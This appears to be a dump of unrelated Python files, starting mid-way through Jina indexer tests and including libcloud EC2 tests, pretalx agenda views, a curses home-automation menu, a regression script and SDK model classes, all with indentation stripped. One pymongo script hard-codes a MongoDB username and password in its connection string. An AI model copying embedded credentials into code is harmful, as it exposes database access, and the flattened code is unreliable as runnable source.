query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_compound_move(random_workspace_move, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'compound-index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
shutil.copytree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'],
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'])
shutil.rmtree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'])
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'compound-query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.fixture
def docker_image():
from jina.parsers.hub import set_hub_build_parser
from jina.docker.hubio import HubIO
args = set_hub_build_parser().parse_args(
[os.path.join(cur_dir, 'numpyhub')])
HubIO(args).build()
@pytest.fixture
def uses_docker(docker_image):
from jina import __version__ as jina_version
os.environ['JINA_QUERY_USES'] = f'docker://jinahub/pod.indexer.dummynumpyindexer:0.0.0-{jina_version}'
os.environ['JINA_QUERY_USES_COMPOUND'] = f'docker://jinahub/pod.indexer.dummynumpyindexer:0.0.0-{jina_version}'
os.environ['JINA_QUERY_USES_INTERNAL'] = 'indexer_with_ref.yml'
os.environ['JINA_QUERY_USES_COMPOUND_INTERNAL'] = 'compound-indexer-with-ref.yml'
yield
del os.environ['JINA_QUERY_USES']
del os.environ['JINA_QUERY_USES_COMPOUND']
@pytest.fixture
def random_workspace_in_docker(tmpdir):
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'] = str(tmpdir)
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'] = '/docker-workspace'
os.environ['JINA_VOLUMES'] = f'{str(tmpdir)}:/docker-workspace'
yield
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER']
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY']
del os.environ['JINA_VOLUMES']
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_in_docker(random_workspace_in_docker, parallel, index_docs, mocker, uses_docker):
top_k = 10
with Flow.load_config(os.path.join('index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join('query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_compound_in_docker(random_workspace_in_docker, parallel, index_docs, mocker, uses_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'compound-index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'compound-query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
|
py | 1a38ac737c6c10284f6e3b3677dddd70f3405861 | #!/usr/bin/env python3
from sensor import sensor
from room_devices import room_devices
from mqtt import mqtt
# from instance import room_devices
from threading import Thread
import curses
import time
def salutation(screen):
screen.addstr(0, 0, "digite 0 para sair do programa")
screen.addstr(1, 0, "digite 1 para adicionar um novo dispositivo")
screen.addstr(2, 0, "digite 2 para setar o estado de um dispositivo")
screen.addstr(3, 0, "digite 3 para parar o alarme")
def input_str(screen, y_pos : int, lenght : int, instructions = "") -> str:
screen.clear()
screen.nodelay(False)
curses.echo()
screen.addstr(y_pos - 1, 0, instructions)
screen.refresh()
string = screen.getstr(y_pos, 0, lenght)
curses.noecho()
screen.nodelay(True)
return string.decode("utf-8")
# mqtt = Mqtt()
if __name__ == "__main__":
try:
polling = room_devices.run_polling()
screen = curses.initscr()
curses.noecho()
screen.nodelay(True)
flag = -1
y_pos = 4
while flag != ord("0"):
screen.clear()
salutation(screen)
room_devices.print_device(screen)
temp, hum = sensor()
screen.addstr(4, 0, f"cรดmodo central. Humidade: {hum} Temperatura {temp}")
if(flag == ord("1")):
room = input_str(screen,2,50,"digite o nome do cรดmodo")
input_device = input_str(screen,2,50,"digite o nome do dispositivo de entrada")
output_device = input_str(screen,2,50,"digite o nome do dispositivo de saรญda")
room_devices.esp_defined_device.update({
room : {
"in": input_device,
"out": output_device
}
})
flag_device = input_str(screen,2,1,"digite 1 para definir o dispositivo ou 0 para usar o padrรฃo")
y_pos += 1
if(int(flag_device)):
matricula = input_str(screen,2,50,"digite a matricula")
mac = input_str(screen,2,50,"digite o endereรงo mac")
thread = Thread(target=mqtt,args = (screen,room,y_pos,matricula,mac), daemon=True)
thread.start()
else:
thread = Thread(target=mqtt,daemon=True,args = (screen,room,y_pos))
thread.start()
elif (flag == ord("2")):
room_name = input_str(screen, 2, 50, "digite o nome do cรดmodo")
state = bool(
int(
input_str(
screen,
2,
1,
"digite seu estado(1 ou 0)")))
room_devices.device_set(room_name, state)
elif (flag == ord("3")):
screen.clear()
try:
room_devices.alarm_handle.terminate()
screen.addstr(6, 0, "alarme desligado")
except AttributeError:
screen.addstr(6, 0, "alarme nรฃo foi inicializado")
flag = screen.getch()
time.sleep(1)
except Exception as err:
curses.endwin()
try:
# dealocating memory
room_devices.alarm_handle.close()
except:
pass
# it's easier to debug raising the error
raise err
curses.endwin()
try:
# dealocating memory
room_devices.alarm_handle.close()
except:
pass
|
py | 1a38acddb326d95510860c354637b60e66919fb6 | # -*- coding: utf-8 -*-
"""Top-level package for owtf-python-client."""
__author__ = """Viyat Bhalodia"""
__email__ = '[email protected]'
__version__ = '0.1.0'
|
py | 1a38ae4767d6b07a23e154a269b92ec51b15689e | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import httplib
from libcloud.compute.drivers.ec2 import EC2NodeDriver, EC2APSENodeDriver
from libcloud.compute.drivers.ec2 import NimbusNodeDriver
from libcloud.compute.drivers.ec2 import EC2APNENodeDriver, IdempotentParamError
from libcloud.compute.base import Node, NodeImage, NodeSize, NodeLocation
from test import MockHttp
from test.compute import TestCaseMixin
from test.file_fixtures import ComputeFileFixtures
from test.secrets import EC2_ACCESS_ID, EC2_SECRET
class EC2Tests(unittest.TestCase, TestCaseMixin):
def setUp(self):
EC2NodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = EC2NodeDriver(EC2_ACCESS_ID, EC2_SECRET)
def test_create_node(self):
image = NodeImage(id='ami-be3adfd7',
name='ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml',
driver=self.driver)
size = NodeSize('m1.small', 'Small Instance', None, None, None, None, driver=self.driver)
node = self.driver.create_node(name='foo', image=image, size=size)
self.assertEqual(node.id, 'i-2ba64342')
def test_create_node_idempotent(self):
EC2MockHttp.type = 'idempotent'
image = NodeImage(id='ami-be3adfd7',
name='ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml',
driver=self.driver)
size = NodeSize('m1.small', 'Small Instance', None, None, None, None, driver=self.driver)
token = 'testclienttoken'
node = self.driver.create_node(name='foo', image=image, size=size,
ex_clienttoken=token)
self.assertEqual(node.id, 'i-2ba64342')
self.assertEqual(node.extra['clienttoken'], token)
# from: http://docs.amazonwebservices.com/AWSEC2/latest/DeveloperGuide/index.html?Run_Instance_Idempotency.html
# If you repeat the request with the same client token, but change
# another request parameter, Amazon EC2 returns an
# IdempotentParameterMismatch error.
# In our case, changing the parameter doesn't actually matter since we
# are forcing the error response fixture.
EC2MockHttp.type = 'idempotent_mismatch'
idem_error = None
try:
self.driver.create_node(name='foo', image=image, size=size,
ex_mincount='2', ex_maxcount='2', # different count
ex_clienttoken=token)
except IdempotentParamError, e:
idem_error = e
self.assertTrue(idem_error is not None)
def test_create_node_no_availability_zone(self):
image = NodeImage(id='ami-be3adfd7',
name='ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml',
driver=self.driver)
size = NodeSize('m1.small', 'Small Instance', None, None, None, None,
driver=self.driver)
node = self.driver.create_node(name='foo', image=image, size=size)
location = NodeLocation(0, 'Amazon US N. Virginia', 'US', self.driver)
self.assertEqual(node.id, 'i-2ba64342')
node = self.driver.create_node(name='foo', image=image, size=size,
location=location)
self.assertEqual(node.id, 'i-2ba64342')
def test_list_nodes(self):
node = self.driver.list_nodes()[0]
public_ips = sorted(node.public_ip)
self.assertEqual(node.id, 'i-4382922a')
self.assertEqual(len(node.public_ip), 2)
self.assertEqual(public_ips[0], '1.2.3.4')
self.assertEqual(public_ips[1], '1.2.3.5')
def test_list_location(self):
locations = self.driver.list_locations()
self.assertTrue(len(locations) > 0)
self.assertTrue(locations[0].availability_zone != None)
def test_reboot_node(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
ret = self.driver.reboot_node(node)
self.assertTrue(ret)
def test_destroy_node(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_list_sizes(self):
region_old = self.driver.region_name
names = [ ('ec2_us_east', 'us-east-1'),
('ec2_us_west', 'us-west-1'),
('ec2_eu_west', 'eu-west-1'),
('ec2_ap_southeast', 'ap-southeast-1'),
('ec2_ap_northeast', 'ap-northeast-1')
]
for api_name, region_name in names:
self.driver.api_name = api_name
self.driver.region_name = region_name
sizes = self.driver.list_sizes()
ids = [s.id for s in sizes]
self.assertTrue('t1.micro' in ids)
self.assertTrue('m1.small' in ids)
self.assertTrue('m1.large' in ids)
self.assertTrue('m1.xlarge' in ids)
self.assertTrue('c1.medium' in ids)
self.assertTrue('c1.xlarge' in ids)
self.assertTrue('m2.xlarge' in ids)
self.assertTrue('m2.2xlarge' in ids)
self.assertTrue('m2.4xlarge' in ids)
if region_name == 'us-east-1':
self.assertEqual(len(sizes), 11)
self.assertTrue('cg1.4xlarge' in ids)
self.assertTrue('cc1.4xlarge' in ids)
else:
self.assertEqual(len(sizes), 9)
self.driver.region_name = region_old
def test_list_images(self):
images = self.driver.list_images()
image = images[0]
self.assertEqual(len(images), 1)
self.assertEqual(image.name, 'ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml')
self.assertEqual(image.id, 'ami-be3adfd7')
def test_ex_list_availability_zones(self):
availability_zones = self.driver.ex_list_availability_zones()
availability_zone = availability_zones[0]
self.assertTrue(len(availability_zones) > 0)
self.assertEqual(availability_zone.name, 'eu-west-1a')
self.assertEqual(availability_zone.zone_state, 'available')
self.assertEqual(availability_zone.region_name, 'eu-west-1')
def test_ex_describe_tags(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
tags = self.driver.ex_describe_tags(node)
self.assertEqual(len(tags), 3)
self.assertTrue('tag' in tags)
self.assertTrue('owner' in tags)
self.assertTrue('stack' in tags)
def test_ex_create_tags(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
self.driver.ex_create_tags(node, {'sample': 'tag'})
def test_ex_delete_tags(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
self.driver.ex_delete_tags(node, {'sample': 'tag'})
def test_ex_describe_addresses_for_node(self):
node1 = Node('i-4382922a', None, None, None, None, self.driver)
ip_addresses1 = self.driver.ex_describe_addresses_for_node(node1)
node2 = Node('i-4382922b', None, None, None, None, self.driver)
ip_addresses2 = sorted(self.driver.ex_describe_addresses_for_node(node2))
node3 = Node('i-4382922g', None, None, None, None, self.driver)
ip_addresses3 = sorted(self.driver.ex_describe_addresses_for_node(node3))
self.assertEqual(len(ip_addresses1), 1)
self.assertEqual(ip_addresses1[0], '1.2.3.4')
self.assertEqual(len(ip_addresses2), 2)
self.assertEqual(ip_addresses2[0], '1.2.3.5')
self.assertEqual(ip_addresses2[1], '1.2.3.6')
self.assertEqual(len(ip_addresses3), 0)
def test_ex_describe_addresses(self):
node1 = Node('i-4382922a', None, None, None, None, self.driver)
node2 = Node('i-4382922g', None, None, None, None, self.driver)
nodes_elastic_ips1 = self.driver.ex_describe_addresses([node1])
nodes_elastic_ips2 = self.driver.ex_describe_addresses([node2])
self.assertEqual(len(nodes_elastic_ips1), 1)
self.assertTrue(node1.id in nodes_elastic_ips1)
self.assertEqual(nodes_elastic_ips1[node1.id], ['1.2.3.4'])
self.assertEqual(len(nodes_elastic_ips2), 1)
self.assertTrue(node2.id in nodes_elastic_ips2)
self.assertEqual(nodes_elastic_ips2[node2.id], [])
def test_ex_change_node_size_same_size(self):
size = NodeSize('m1.small', 'Small Instance', None, None, None, None, driver=self.driver)
node = Node('i-4382922a', None, None, None, None, self.driver,
extra={'instancetype': 'm1.small'})
try:
self.driver.ex_change_node_size(node=node, new_size=size)
except ValueError:
pass
else:
self.fail('Same size was passed, but an exception was not thrown')
def test_ex_change_node_size(self):
size = NodeSize('m1.large', 'Small Instance', None, None, None, None, driver=self.driver)
node = Node('i-4382922a', None, None, None, None, self.driver,
extra={'instancetype': 'm1.small'})
result = self.driver.ex_change_node_size(node=node, new_size=size)
self.assertTrue(result)
class EC2MockHttp(MockHttp):
fixtures = ComputeFileFixtures('ec2')
def _DescribeInstances(self, method, url, body, headers):
body = self.fixtures.load('describe_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeAvailabilityZones(self, method, url, body, headers):
body = self.fixtures.load('describe_availability_zones.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _RebootInstances(self, method, url, body, headers):
body = self.fixtures.load('reboot_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeImages(self, method, url, body, headers):
body = self.fixtures.load('describe_images.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _RunInstances(self, method, url, body, headers):
body = self.fixtures.load('run_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _idempotent_RunInstances(self, method, url, body, headers):
body = self.fixtures.load('run_instances_idem.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _idempotent_mismatch_RunInstances(self, method, url, body, headers):
body = self.fixtures.load('run_instances_idem_mismatch.xml')
return (httplib.BAD_REQUEST, body, {}, httplib.responses[httplib.BAD_REQUEST])
def _TerminateInstances(self, method, url, body, headers):
body = self.fixtures.load('terminate_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeTags(self, method, url, body, headers):
body = self.fixtures.load('describe_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _CreateTags(self, method, url, body, headers):
body = self.fixtures.load('create_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DeleteTags(self, method, url, body, headers):
body = self.fixtures.load('delete_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeAddresses(self, method, url, body, headers):
body = self.fixtures.load('describe_addresses_multi.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _ModifyInstanceAttribute(self, method, url, body, headers):
body = self.fixtures.load('modify_instance_attribute.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _idempotent_CreateTags(self, method, url, body, headers):
body = self.fixtures.load('create_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
class EC2APSETests(EC2Tests):
def setUp(self):
EC2APSENodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = EC2APSENodeDriver(EC2_ACCESS_ID, EC2_SECRET)
class EC2APNETests(EC2Tests):
def setUp(self):
EC2APNENodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = EC2APNENodeDriver(EC2_ACCESS_ID, EC2_SECRET)
class NimbusTests(EC2Tests):
def setUp(self):
NimbusNodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = NimbusNodeDriver(EC2_ACCESS_ID, EC2_SECRET,
host="some.nimbuscloud.com")
def test_ex_describe_addresses_for_node(self):
# overridden from EC2Tests -- Nimbus doesn't support elastic IPs.
node = Node('i-4382922a', None, None, None, None, self.driver)
ip_addresses = self.driver.ex_describe_addresses_for_node(node)
self.assertEqual(len(ip_addresses), 0)
def test_ex_describe_addresses(self):
# overridden from EC2Tests -- Nimbus doesn't support elastic IPs.
node = Node('i-4382922a', None, None, None, None, self.driver)
nodes_elastic_ips = self.driver.ex_describe_addresses([node])
self.assertEqual(len(nodes_elastic_ips), 1)
self.assertEqual(len(nodes_elastic_ips[node.id]), 0)
def test_list_sizes(self):
sizes = self.driver.list_sizes()
ids = [s.id for s in sizes]
self.assertTrue('m1.small' in ids)
self.assertTrue('m1.large' in ids)
self.assertTrue('m1.xlarge' in ids)
def test_list_nodes(self):
# overridden from EC2Tests -- Nimbus doesn't support elastic IPs.
node = self.driver.list_nodes()[0]
public_ips = node.public_ip
self.assertEqual(node.id, 'i-4382922a')
self.assertEqual(len(node.public_ip), 1)
self.assertEqual(public_ips[0], '1.2.3.5')
if __name__ == '__main__':
sys.exit(unittest.main())
|
py | 1a38aec7bbfca483f5972d490b79e8755b202342 | ###########################
#
# #277 A Modified Collatz sequence - Project Euler
# https://projecteuler.net/problem=277
#
# Code by Kevin Marciniak
#
###########################
|
py | 1a38aec9b57f8475e35971bc4e86122d17d73898 | # Predicting Customer Lifetime Value
## Loading and Viewing Data
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import os
import matplotlib.pylab as plt
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import sklearn.metrics
raw_data = pd.read_csv("history.csv")
raw_data.dtypes
print(raw_data.head(5))
## Do Correlation Analysis
cleaned_data = raw_data.drop("CUST_ID",axis=1)
cleaned_data .corr()['CLV']
## Do Training and Testing Split
# Let us split the data into training and testing datasets in the ratio 90:10.
predictors = cleaned_data.drop("CLV",axis=1)
targets = cleaned_data.CLV
pred_train, pred_test, tar_train, tar_test = train_test_split(predictors, targets, test_size=.1)
print( "Predictor - Training : ", pred_train.shape, "Predictor - Testing : ", pred_test.shape )
## Build and Test Model
# Build model on training data
model = LinearRegression()
model.fit(pred_train,tar_train)
print("Coefficients: \n", model.coef_)
print("Intercept:", model.intercept_)
# Test on testing data
predictions = model.predict(pred_test)
predictions
sklearn.metrics.r2_score(tar_test, predictions)
## Predicting for a new Customer
new_data = np.array([100,0,50,0,0,0]).reshape(1, -1)
new_pred=model.predict(new_data)
print("The CLV for the new customer is : $",new_pred[0]) |
py | 1a38afad5288cf0593e0071d0fbcaa8701ddee7b | from pymongo import MongoClient
# pprint library is used to make the output look more pretty
from pprint import pprint
# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string
#Username = capstone, password=mongopassword, databasename = hunter_collab
client = MongoClient("mongodb://capstone:[email protected]:27017,cluster0-shard-00-01-we2hu.mongodb.net:27017,cluster0-shard-00-02-we2hu.mongodb.net:27017/client_example?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true")
adminDB = client.admin
db = client.hunter_collab
# Issue the serverStatus command and print the results
serverStatusResult=adminDB.command("serverStatus")
#pprint(serverStatusResult)
|
py | 1a38afafe71e8d312fcdedc726fdd16eecfa0414 | from contextlib import suppress
from urllib.parse import urlparse
import vobject
from django.conf import settings
from django.contrib import messages
from django.db.models import Q
from django.http import Http404, HttpResponse
from django.shortcuts import render
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DetailView, FormView, ListView
from pretalx.agenda.signals import register_recording_provider
from pretalx.cfp.views.event import EventPageMixin
from pretalx.common.mixins.views import (
EventPermissionRequired, Filterable, PermissionRequired,
)
from pretalx.common.phrases import phrases
from pretalx.person.models.profile import SpeakerProfile
from pretalx.schedule.models import Schedule, TalkSlot
from pretalx.submission.forms import FeedbackForm
from pretalx.submission.models import Feedback, QuestionTarget, Submission
class TalkList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'talks'
model = Submission
template_name = 'agenda/talks.html'
permission_required = 'agenda.view_schedule'
default_filters = ('speakers__name__icontains', 'title__icontains')
def get_queryset(self):
return self.filter_queryset(self.request.event.talks).distinct()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class SpeakerList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'speakers'
template_name = 'agenda/speakers.html'
permission_required = 'agenda.view_schedule'
default_filters = ('user__name__icontains',)
def get_queryset(self):
qs = SpeakerProfile.objects.filter(
user__in=self.request.event.speakers, event=self.request.event
).select_related('user', 'event')
return self.filter_queryset(qs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class TalkView(PermissionRequired, DetailView):
context_object_name = 'submission'
model = Submission
slug_field = 'code'
template_name = 'agenda/talk.html'
permission_required = 'agenda.view_slot'
def get_object(self, queryset=None):
with suppress(AttributeError, Submission.DoesNotExist):
return self.request.event.talks.get(
code__iexact=self.kwargs['slug'],
)
if getattr(self.request, 'is_orga', False):
talk = self.request.event.wip_schedule.talks.filter(
submission__code__iexact=self.kwargs['slug'], is_visible=True
).first()
if talk:
return talk.submission
raise Http404()
@cached_property
def recording(self):
for receiver, response in register_recording_provider.send_robust(
self.request.event
):
if (
response
and not isinstance(response, Exception)
and hasattr(response, 'get_recording')
):
recording = response.get_recording(self.object)
if recording and recording['iframe']:
return recording
else:
print(response)
if self.object.rendered_recording_iframe:
return {
'iframe': self.object.rendered_recording_iframe,
'csp_header': 'https://media.ccc.de',
}
return {}
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
if self.recording.get('csp_header'):
response._csp_update = {'child-src': self.recording.get('csp_header')}
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
qs = TalkSlot.objects.none()
schedule = Schedule.objects.none()
submission = self.object
if self.request.event.current_schedule:
schedule = self.request.event.current_schedule
qs = schedule.talks.filter(is_visible=True)
elif self.request.is_orga:
schedule = self.request.event.wip_schedule
qs = schedule.talks.all()
context['talk_slots'] = qs.filter(submission=submission).order_by('start')
context['submission_description'] = (
submission.description
or submission.abstract
or _('The talk ยป{title}ยซ at {event}').format(
title=submission.title, event=submission.event.name
)
)
context['recording_iframe'] = self.recording.get('iframe')
context['answers'] = submission.answers.filter(
question__is_public=True,
question__event=self.request.event,
question__target=QuestionTarget.SUBMISSION,
)
context['speakers'] = []
other_submissions = schedule.slots.exclude(pk=submission.pk)
for speaker in submission.speakers.all():
speaker.talk_profile = speaker.event_profile(event=self.request.event)
speaker.other_submissions = other_submissions.filter(speakers__in=[speaker])
context['speakers'].append(speaker)
return context
class TalkReviewView(DetailView):
model = Submission
slug_field = 'review_code'
template_name = 'agenda/talk.html'
class SingleICalView(EventPageMixin, DetailView):
model = Submission
slug_field = 'code'
def get(self, request, event, **kwargs):
talk = (
self.get_object()
.slots.filter(schedule=self.request.event.current_schedule, is_visible=True)
.first()
)
if not talk:
raise Http404()
netloc = urlparse(settings.SITE_URL).netloc
cal = vobject.iCalendar()
cal.add('prodid').value = '-//pretalx//{}//{}'.format(
netloc, talk.submission.code
)
talk.build_ical(cal)
code = talk.submission.code
resp = HttpResponse(cal.serialize(), content_type='text/calendar')
resp[
'Content-Disposition'
] = f'attachment; filename="{request.event.slug}-{code}.ics"'
return resp
class FeedbackView(PermissionRequired, FormView):
model = Feedback
form_class = FeedbackForm
template_name = 'agenda/feedback_form.html'
permission_required = 'agenda.give_feedback'
def get_object(self):
return Submission.objects.filter(
event=self.request.event,
code__iexact=self.kwargs['slug'],
slots__in=self.request.event.current_schedule.talks.filter(is_visible=True),
).first()
def get(self, *args, **kwargs):
talk = self.get_object()
if talk and self.request.user in talk.speakers.all():
return render(
self.request,
'agenda/feedback.html',
context={
'talk': talk,
'feedback': talk.feedback.filter(
Q(speaker__isnull=True) | Q(speaker=self.request.user)
),
},
)
return super().get(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['talk'] = self.get_object()
return kwargs
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['talk'] = self.get_object()
return context
def form_valid(self, form):
result = super().form_valid(form)
form.save()
messages.success(self.request, phrases.agenda.feedback_success)
return result
def get_success_url(self):
return self.get_object().urls.public
|
py | 1a38b0b69419b7c969532edd6ae5c5382edc3a61 | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
from ask_sdk_model.directive import Directive
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional
from datetime import datetime
class RenderDocumentDirective(Directive):
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
deserialized_types = {
'object_type': 'str',
'token': 'str',
'document': 'dict(str, object)',
'datasources': 'dict(str, object)',
'packages': 'list[object]'
}
attribute_map = {
'object_type': 'type',
'token': 'token',
'document': 'document',
'datasources': 'datasources',
'packages': 'packages'
}
def __init__(self, token=None, document=None, datasources=None, packages=None):
# type: (Optional[str], Optional[Dict[str, object]], Optional[Dict[str, object]], Optional[List[object]]) -> None
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
self.__discriminator_value = "Alexa.Presentation.APL.RenderDocument"
self.object_type = self.__discriminator_value
super(RenderDocumentDirective, self).__init__(object_type=self.__discriminator_value)
self.token = token
self.document = document
self.datasources = datasources
self.packages = packages
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, RenderDocumentDirective):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a38b11bd0d2bdb55db4010ceecc766c6ae473d0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import ErrorDetail
from ._models_py3 import ErrorResponse
from ._models_py3 import Identity
from ._models_py3 import LocationData
from ._models_py3 import Machine
from ._models_py3 import MachineExtension
from ._models_py3 import MachineExtensionInstanceView
from ._models_py3 import MachineExtensionInstanceViewStatus
from ._models_py3 import MachineExtensionProperties
from ._models_py3 import MachineExtensionPropertiesAutoGenerated
from ._models_py3 import MachineExtensionPropertiesInstanceView
from ._models_py3 import MachineExtensionUpdate
from ._models_py3 import MachineExtensionUpdateProperties
from ._models_py3 import MachineExtensionUpdatePropertiesAutoGenerated
from ._models_py3 import MachineExtensionsListResult
from ._models_py3 import MachineIdentity
from ._models_py3 import MachineListResult
from ._models_py3 import MachineProperties
from ._models_py3 import MachinePropertiesAutoGenerated
from ._models_py3 import MachinePropertiesOsProfile
from ._models_py3 import MachineUpdate
from ._models_py3 import MachineUpdateIdentity
from ._models_py3 import MachineUpdateProperties
